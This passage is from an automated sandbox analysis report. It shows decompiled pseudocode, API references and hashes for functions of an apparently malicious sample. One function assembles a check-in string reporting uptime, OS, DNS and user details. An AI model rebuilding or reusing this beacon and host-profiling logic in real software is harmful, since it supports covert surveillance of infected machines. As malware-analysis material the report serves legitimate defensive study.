													__eflags = _t86;
													 *0x5ea380 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x5ea388 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x5ea384 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x5ea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x5ea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x5ea3c8 = 1;
							__eflags =  *0x5ea3c8;
							if( *0x5ea3c8 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x5ea388 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x5ea388 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x5ea3c8 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x5ea388 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x5ea380 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x5ea388 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x5ea388 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































          0x005e855b
          0x005e855e
          0x005e8564
          0x005e8582
          0x00000000
          0x005e8582
          0x005e856c
          0x005e8575
          0x005e857b
          0x005e858a
          0x005e858d
          0x005e8590
          0x005e859a
          0x005e859a
          0x005e859c
          0x005e859f
          0x005e85a1
          0x005e85a1
          0x005e85a3
          0x005e85a6
          0x00000000
          0x00000000
          0x005e85a8
          0x005e85aa
          0x005e8610
          0x005e8610
          0x005e876e
          0x00000000
          0x005e876e
          0x005e85ac
          0x005e85ac
          0x005e85b0
          0x005e85b2
          0x005e85b2
          0x005e85b2
          0x005e85b2
          0x005e85b5
          0x005e85b6
          0x005e85b9
          0x005e85b9
          0x005e85bd
          0x005e85c1
          0x005e85cf
          0x005e85cf
          0x005e85d7
          0x005e85dd
          0x005e85df
          0x005e85e1
          0x005e85f1
          0x005e85fe
          0x005e8602
          0x005e8607
          0x005e8609
          0x005e8687
          0x005e8687
          0x005e860b
          0x005e860b
          0x005e860b
          0x005e8689
          0x005e868b
          0x005e876c
          0x005e876c
          0x00000000
          0x005e8691
          0x005e8691
          0x005e8698
          0x00000000
          0x00000000
          0x005e869e
          0x005e86a2
          0x005e86fe
          0x005e8700
          0x005e8708
          0x005e870a
          0x005e870c
          0x00000000
          0x00000000
          0x005e870e
          0x005e8714
          0x005e8716
          0x005e8718
          0x005e872d
          0x005e872d
          0x005e872f
          0x005e875e
          0x005e8765
          0x00000000
          0x005e8765
          0x005e8733
          0x005e8734
          0x005e8736
          0x005e8738
          0x005e8738
          0x005e873a
          0x005e873c
          0x005e873e
          0x005e8752
          0x005e8752
          0x005e8755
          0x005e8757
          0x005e8757
          0x005e8758
          0x005e8758
          0x00000000
          0x005e8740
          0x005e8740
          0x005e8740
          0x005e8749
          0x005e874a
          0x005e874c
          0x005e874e
          0x005e874e
          0x00000000
          0x005e8740
          0x005e873e
          0x005e871a
          0x005e8721
          0x005e8721
          0x005e8723
          0x00000000
          0x00000000
          0x005e8725
          0x005e8726
          0x005e8729
          0x005e872b
          0x00000000
          0x00000000
          0x00000000
          0x005e872b
          0x00000000
          0x005e8721
          0x005e86a4
          0x005e86a7
          0x005e86ac
          0x00000000
          0x00000000
          0x005e86b5
          0x005e86b7
          0x005e86bd
          0x00000000
          0x00000000
          0x005e86c3
          0x005e86c9
          0x00000000
          0x00000000
          0x005e86cf
          0x005e86d1
          0x005e86da
          0x005e86de
          0x00000000
          0x00000000
          0x005e86e4
          0x005e86e7
          0x005e86e9
          0x00000000
          0x00000000
          0x005e86f0
          0x005e86f2
          0x00000000
          0x00000000
          0x005e86f4
          0x005e86f8
          0x00000000
          0x00000000
          0x00000000
          0x005e86f8
          0x00000000
          0x00000000
          0x00000000
          0x005e85e3
          0x005e85e3
          0x005e85e3
          0x005e85ea
          0x00000000
          0x00000000
          0x005e85ec
          0x005e85ed
          0x005e85ef
          0x00000000
          0x00000000
          0x00000000
          0x005e85ef
          0x005e8617
          0x005e8619
          0x00000000
          0x00000000
          0x005e8629
          0x005e862b
          0x005e862d
          0x00000000
          0x00000000
          0x005e8633
          0x005e863a
          0x005e8666
          0x005e8666
          0x005e8668
          0x005e866a
          0x005e867e
          0x005e8680
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x005e866c
          0x005e866c
          0x005e866c
          0x005e8675
          0x005e8676
          0x005e8678
          0x005e867a
          0x005e867a
          0x00000000
          0x005e866c
          0x005e863c
          0x005e863c
          0x005e863f
          0x005e8641
          0x005e8653
          0x005e8653
          0x005e8656
          0x005e8658
          0x005e8658
          0x005e8659
          0x005e8659
          0x005e865f
          0x005e865f
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x005e8643
          0x005e8643
          0x005e8643
          0x005e864a
          0x00000000
          0x00000000
          0x005e864c
          0x005e864c
          0x005e864d
          0x00000000
          0x00000000
          0x00000000
          0x005e864d
          0x005e864f
          0x005e8651
          0x005e8664
          0x00000000
          0x00000000
          0x00000000
          0x005e8664
          0x00000000
          0x005e8651
          0x005e85c3
          0x005e85c6
          0x005e85c9
          0x00000000
          0x00000000
          0x005e85cb
          0x005e85cd
          0x00000000
          0x00000000
          0x00000000
          0x005e85cd
          0x005e8592
          0x005e8594
          0x00000000
          0x00000000
          0x00000000
          0x00000000

          APIs
          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005E8602
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: MemoryQueryVirtual
          • String ID:
          • API String ID: 2850889275-0
          • Opcode ID: 073cd6ed5c84529ac8f2912e8aef8690bee3d0f8b1138c6425481cd60ab62373
          • Instruction ID: fedc93b7175571a25d6fdeb19c07d51f5d828a3b652117a043434ee3e7329f42
          • Opcode Fuzzy Hash: 073cd6ed5c84529ac8f2912e8aef8690bee3d0f8b1138c6425481cd60ab62373
          • Instruction Fuzzy Hash: 5761E4316006C29FDB2DCF2AC9807397BA1FBA5354B348869D4DECB291EF32EC459650
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E832C Relevance: .1, Instructions: 77COMMONCrypto
          Download Yara Rule
          C-Code - Quality: 71%
          			E005E832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E005E8497(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E005E8551(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E005E843C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E005E8497(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E005E8533(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























          0x005e8330
          0x005e8331
          0x005e8332
          0x005e8335
          0x005e8337
          0x005e833a
          0x005e833b
          0x005e833d
          0x005e833e
          0x005e833f
          0x005e8342
          0x005e834c
          0x005e83fd
          0x005e8404
          0x005e840d
          0x005e8352
          0x005e8352
          0x005e8358
          0x005e835e
          0x005e8361
          0x005e8364
          0x005e8368
          0x005e836d
          0x005e8372
          0x005e83f2
          0x00000000
          0x005e8374
          0x005e8374
          0x005e8380
          0x005e8382
          0x005e83dd
          0x005e83dd
          0x005e83e3
          0x00000000
          0x005e8384
          0x005e8393
          0x005e8395
          0x005e8396
          0x005e8397
          0x005e839a
          0x005e839a
          0x005e839c
          0x00000000
          0x005e839e
          0x005e839e
          0x005e83e8
          0x005e83a0
          0x005e83a0
          0x005e83a4
          0x005e83ac
          0x005e83b1
          0x005e83b6
          0x005e83c2
          0x005e83ca
          0x005e83d1
          0x005e83d7
          0x005e83db
          0x00000000
          0x005e83db
          0x005e839e
          0x005e839c
          0x00000000
          0x005e8382
          0x005e83f6
          0x005e83f6
          0x005e83f6
          0x005e8372
          0x005e8412
          0x005e8419

          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
          • Instruction ID: 15d595eb5229c1eeaa46f7f2fffef7e02eacb6ae7a855becc9922b72e7e51946
          • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
          • Instruction Fuzzy Hash: 6A21F4329002459BCB18EF69CCC48BBBFA5FF48310B458568E8999B245EB30F915CBE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005C0D90 Relevance: .0, Instructions: 43COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.580647391.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5c0000_server_(3).jbxd
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
          • Instruction ID: 3635990d3ec3bd694f5054effc51741b7f6de1521dd672cf8a96975be21f92d7
          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
          • Instruction Fuzzy Hash: 6C01A276A00604CFDF21DFA4C844FAB37E9FB86316F4544A9E90B972C2E774A941CB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E2B91 Relevance: 45.8, APIs: 25, Strings: 1, Instructions: 278memorystringCOMMON
          Download Yara Rule
          C-Code - Quality: 76%
          			E005E2B91(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				void* _t76;
				intOrPtr _t77;
				int _t80;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				void* _t89;
				void* _t92;
				intOrPtr _t96;
				intOrPtr _t100;
				intOrPtr* _t102;
				int* _t108;
				int* _t118;
				char** _t120;
				char* _t121;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr _t135;
				intOrPtr _t139;
				int _t142;
				intOrPtr _t144;
				int _t147;
				intOrPtr _t148;
				int _t151;
				void* _t152;
				intOrPtr _t166;
				void* _t168;
				int _t169;
				void* _t170;
				void* _t171;
				long _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr _t175;
				intOrPtr* _t178;
				char** _t181;
				char** _t183;
				char** _t184;
				void* _t189;

				_t68 = __eax;
				_t181 =  &_v16;
				_t152 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t68 = GetTickCount();
				}
				_t69 =  *0x5ea018; // 0xc5e3c68d
				asm("bswap eax");
				_t70 =  *0x5ea014; // 0x3a87c8cd
				asm("bswap eax");
				_t71 =  *0x5ea010; // 0xd8d2f808
				asm("bswap eax");
				_t72 =  *0x5ea00c; // 0x81762942
				asm("bswap eax");
				_t73 =  *0x5ea348; // 0x25dd5a8
				_t3 = _t73 + 0x5eb5ac; // 0x74666f73
				_t169 = wsprintfA(_t152, _t3, 3, 0x3d18f, _t72, _t71, _t70, _t69,  *0x5ea02c,  *0x5ea004, _t68);
				_t76 = E005E467F();
				_t77 =  *0x5ea348; // 0x25dd5a8
				_t4 = _t77 + 0x5eb575; // 0x74707526
				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
				_t183 =  &(_t181[0xe]);
				_t170 = _t169 + _t80;
				if(_a24 != 0) {
					_t148 =  *0x5ea348; // 0x25dd5a8
					_t8 = _t148 + 0x5eb508; // 0x732526
					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
					_t183 =  &(_t183[3]);
					_t170 = _t170 + _t151;
				}
				_t81 =  *0x5ea348; // 0x25dd5a8
				_t10 = _t81 + 0x5eb89e; // 0x2bc8e46
				_t153 = _t10;
				_t189 = _a20 - _t10;
				_t12 = _t81 + 0x5eb246; // 0x74636126
				_t164 = 0 | _t189 == 0x00000000;
				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
				_t85 =  *0x5ea36c; // 0x2bc95b0
				_t184 =  &(_t183[3]);
				if(_t85 != 0) {
					_t144 =  *0x5ea348; // 0x25dd5a8
					_t16 = _t144 + 0x5eb8be; // 0x3d736f26
					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t147;
				}
				_t86 = E005E472F(_t153);
				_a32 = _t86;
				if(_t86 != 0) {
					_t139 =  *0x5ea348; // 0x25dd5a8
					_t19 = _t139 + 0x5eb8d0; // 0x736e6426
					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
					_t184 =  &(_t184[3]);
					_t171 = _t171 + _t142;
					HeapFree( *0x5ea2d8, 0, _a40);
				}
				_t87 = E005E1340();
				_a32 = _t87;
				if(_t87 != 0) {
					_t135 =  *0x5ea348; // 0x25dd5a8
					_t23 = _t135 + 0x5eb8c5; // 0x6f687726
					wsprintfA(_t171 + _t152, _t23, _t87);
					_t184 =  &(_t184[3]);
					HeapFree( *0x5ea2d8, 0, _a40);
				}
				_t166 =  *0x5ea3cc; // 0x2bc9600
				_t89 = E005E6B59(0x5ea00a, _t166 + 4);
				_t172 = 0;
				_a16 = _t89;
				if(_t89 == 0) {
					L30:
					HeapFree( *0x5ea2d8, _t172, _t152);
					return _a44;
				} else {
					_t92 = RtlAllocateHeap( *0x5ea2d8, 0, 0x800);
					_a24 = _t92;
					if(_t92 == 0) {
						L29:
						HeapFree( *0x5ea2d8, _t172, _a8);
						goto L30;
					}
					E005E2915(GetTickCount());
					_t96 =  *0x5ea3cc; // 0x2bc9600
					__imp__(_t96 + 0x40);
					asm("lock xadd [eax], ecx");
					_t100 =  *0x5ea3cc; // 0x2bc9600
					__imp__(_t100 + 0x40);
					_t102 =  *0x5ea3cc; // 0x2bc9600
					_t168 = E005E6675(1, _t164, _t152,  *_t102);
					asm("lock xadd [eax], ecx");
					if(_t168 == 0) {
						L28:
						HeapFree( *0x5ea2d8, _t172, _a16);
						goto L29;
					}
					StrTrimA(_t168, 0x5e9280);
					_push(_t168);
					_t108 = E005E7563();
					_v12 = _t108;
					if(_t108 == 0) {
						L27:
						HeapFree( *0x5ea2d8, _t172, _t168);
						goto L28;
					}
					_t173 = __imp__;
					 *_t173(_t168, _a8);
					 *_t173(_a4, _v12);
					_t174 = __imp__;
					 *_t174(_v4, _v24);
					_t175 = E005E6536( *_t174(_v12, _t168), _v20);
					_v36 = _t175;
					if(_t175 == 0) {
						_v8 = 8;
						L25:
						E005E63F6();
						L26:
						HeapFree( *0x5ea2d8, 0, _v40);
						_t172 = 0;
						goto L27;
					}
					_t118 = E005E6F7D(_t152, 0xffffffffffffffff, _t168,  &_v24);
					_v12 = _t118;
					if(_t118 == 0) {
						_t178 = _v24;
						_v20 = E005E597D(_t178, _t175, _v16, _v12);
						_t126 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
						_t128 =  *((intOrPtr*)(_t178 + 8));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
						_t130 =  *((intOrPtr*)(_t178 + 4));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
						_t132 =  *_t178;
						 *((intOrPtr*)( *_t132 + 8))(_t132);
						E005E61DA(_t178);
					}
					if(_v8 != 0x10d2) {
						L20:
						if(_v8 == 0) {
							_t120 = _v16;
							if(_t120 != 0) {
								_t121 =  *_t120;
								_t176 =  *_v12;
								_v16 = _t121;
								wcstombs(_t121, _t121,  *_v12);
								 *_v24 = E005E673A(_v16, _v16, _t176 >> 1);
							}
						}
						goto L23;
					} else {
						if(_v16 != 0) {
							L23:
							E005E61DA(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L26;
							} else {
								goto L25;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L20;
					}
				}
			}






























































          0x005e2b91
          0x005e2b91
          0x005e2b95
          0x005e2b9c
          0x005e2ba6
          0x005e2ba8
          0x005e2ba8
          0x005e2bb5
          0x005e2bc0
          0x005e2bc3
          0x005e2bce
          0x005e2bd1
          0x005e2bd6
          0x005e2bd9
          0x005e2bde
          0x005e2be1
          0x005e2bed
          0x005e2bfa
          0x005e2bfc
          0x005e2c02
          0x005e2c07
          0x005e2c12
          0x005e2c14
          0x005e2c17
          0x005e2c1e
          0x005e2c20
          0x005e2c29
          0x005e2c34
          0x005e2c36
          0x005e2c39
          0x005e2c39
          0x005e2c3b
          0x005e2c40
          0x005e2c40
          0x005e2c48
          0x005e2c4c
          0x005e2c52
          0x005e2c5d
          0x005e2c5f
          0x005e2c64
          0x005e2c69
          0x005e2c6c
          0x005e2c71
          0x005e2c7c
          0x005e2c7e
          0x005e2c81
          0x005e2c81
          0x005e2c83
          0x005e2c8e
          0x005e2c94
          0x005e2c97
          0x005e2c9c
          0x005e2ca7
          0x005e2ca9
          0x005e2cb0
          0x005e2cba
          0x005e2cba
          0x005e2cbc
          0x005e2cc1
          0x005e2cc7
          0x005e2cca
          0x005e2ccf
          0x005e2cd9
          0x005e2cdb
          0x005e2cea
          0x005e2cea
          0x005e2cec
          0x005e2cfa
          0x005e2cff
          0x005e2d01
          0x005e2d07
          0x005e2ee7
          0x005e2eef
          0x005e2efc
          0x005e2d0d
          0x005e2d19
          0x005e2d1f
          0x005e2d25
          0x005e2eda
          0x005e2ee5
          0x00000000
          0x005e2ee5
          0x005e2d31
          0x005e2d36
          0x005e2d3f
          0x005e2d50
          0x005e2d54
          0x005e2d5d
          0x005e2d63
          0x005e2d70
          0x005e2d7d
          0x005e2d83
          0x005e2ecd
          0x005e2ed8
          0x00000000
          0x005e2ed8
          0x005e2d8f
          0x005e2d95
          0x005e2d96
          0x005e2d9b
          0x005e2da1
          0x005e2ec3
          0x005e2ecb
          0x00000000
          0x005e2ecb
          0x005e2dab
          0x005e2db2
          0x005e2dbc
          0x005e2dc2
          0x005e2dcc
          0x005e2dde
          0x005e2de0
          0x005e2de6
          0x005e2eff
          0x005e2eae
          0x005e2eae
          0x005e2eb3
          0x005e2ebf
          0x005e2ec1
          0x00000000
          0x005e2ec1
          0x005e2df1
          0x005e2df6
          0x005e2dfc
          0x005e2e07
          0x005e2e12
          0x005e2e16
          0x005e2e1c
          0x005e2e22
          0x005e2e28
          0x005e2e2b
          0x005e2e31
          0x005e2e34
          0x005e2e39
          0x005e2e3d
          0x005e2e3d
          0x005e2e4a
          0x005e2e58
          0x005e2e5d
          0x005e2e5f
          0x005e2e65
          0x005e2e6b
          0x005e2e6d
          0x005e2e72
          0x005e2e76
          0x005e2e92
          0x005e2e92
          0x005e2e65
          0x00000000
          0x005e2e4c
          0x005e2e51
          0x005e2e94
          0x005e2e98
          0x005e2ea2
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x005e2ea2
          0x005e2e53
          0x00000000
          0x005e2e53
          0x005e2e4a

          APIs
          • GetTickCount.KERNEL32 ref: 005E2BA8
          • wsprintfA.USER32 ref: 005E2BF5
          • wsprintfA.USER32 ref: 005E2C12
          • wsprintfA.USER32 ref: 005E2C34
          • wsprintfA.USER32 ref: 005E2C5B
          • wsprintfA.USER32 ref: 005E2C7C
          • wsprintfA.USER32 ref: 005E2CA7
          • HeapFree.KERNEL32(00000000,?), ref: 005E2CBA
          • wsprintfA.USER32 ref: 005E2CD9
          • HeapFree.KERNEL32(00000000,?), ref: 005E2CEA
            • Part of subcall function 005E6B59: RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E6B75
            • Part of subcall function 005E6B59: RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E6B93
          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 005E2D19
          • GetTickCount.KERNEL32 ref: 005E2D2B
          • RtlEnterCriticalSection.NTDLL(02BC95C0), ref: 005E2D3F
          • RtlLeaveCriticalSection.NTDLL(02BC95C0), ref: 005E2D5D
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A0
            • Part of subcall function 005E6675: lstrlen.KERNEL32(00000000,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66A8
            • Part of subcall function 005E6675: strcpy.NTDLL ref: 005E66BF
            • Part of subcall function 005E6675: lstrcat.KERNEL32(00000000,00000000), ref: 005E66CA
            • Part of subcall function 005E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,005E3ECE,?,775EC740,005E3ECE,00000000,02BC9600), ref: 005E66E7
          • StrTrimA.SHLWAPI(00000000,005E9280,?,02BC9600), ref: 005E2D8F
            • Part of subcall function 005E7563: lstrlen.KERNEL32(02BC9C10,00000000,00000000,00000000,005E3EF9,00000000), ref: 005E7573
            • Part of subcall function 005E7563: lstrlen.KERNEL32(?), ref: 005E757B
            • Part of subcall function 005E7563: lstrcpy.KERNEL32(00000000,02BC9C10), ref: 005E758F
            • Part of subcall function 005E7563: lstrcat.KERNEL32(00000000,?), ref: 005E759A
          • lstrcpy.KERNEL32(00000000,?), ref: 005E2DB2
          • lstrcpy.KERNEL32(?,?), ref: 005E2DBC
          • lstrcat.KERNEL32(?,?), ref: 005E2DCC
          • lstrcat.KERNEL32(?,00000000), ref: 005E2DD3
            • Part of subcall function 005E6536: lstrlen.KERNEL32(?,00000000,02BC9E18,00000000,005E6F0A,02BCA03B,43175AC3,?,?,?,?,43175AC3,00000005,005EA00C,4D283A53,?), ref: 005E653D
            • Part of subcall function 005E6536: mbstowcs.NTDLL ref: 005E6566
            • Part of subcall function 005E6536: memset.NTDLL ref: 005E6578
          • wcstombs.NTDLL ref: 005E2E76
            • Part of subcall function 005E597D: SysAllocString.OLEAUT32(?), ref: 005E59B8
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • HeapFree.KERNEL32(00000000,?), ref: 005E2EBF
          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 005E2ECB
          • HeapFree.KERNEL32(00000000,?,?,02BC9600), ref: 005E2ED8
          • HeapFree.KERNEL32(00000000,?), ref: 005E2EE5
          • HeapFree.KERNEL32(00000000,?), ref: 005E2EEF
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
          • String ID: Uqt
          • API String ID: 1185349883-2320327147
          • Opcode ID: b0f201cd5090e54d3b3bc8d59a18c7a4e9d9db25ac143981bb268307c5c2ec4d
          • Instruction ID: c2885c780b4167474f65f9d69ba4593d54c756ca47ea832f5a77db7fc3a5d8b7
          • Opcode Fuzzy Hash: b0f201cd5090e54d3b3bc8d59a18c7a4e9d9db25ac143981bb268307c5c2ec4d
          • Instruction Fuzzy Hash: E1A18A71500291AFC719DF66DC88E6A7BE8FF98354F050928F4C8DB221D731E849EB62
          Uniqueness

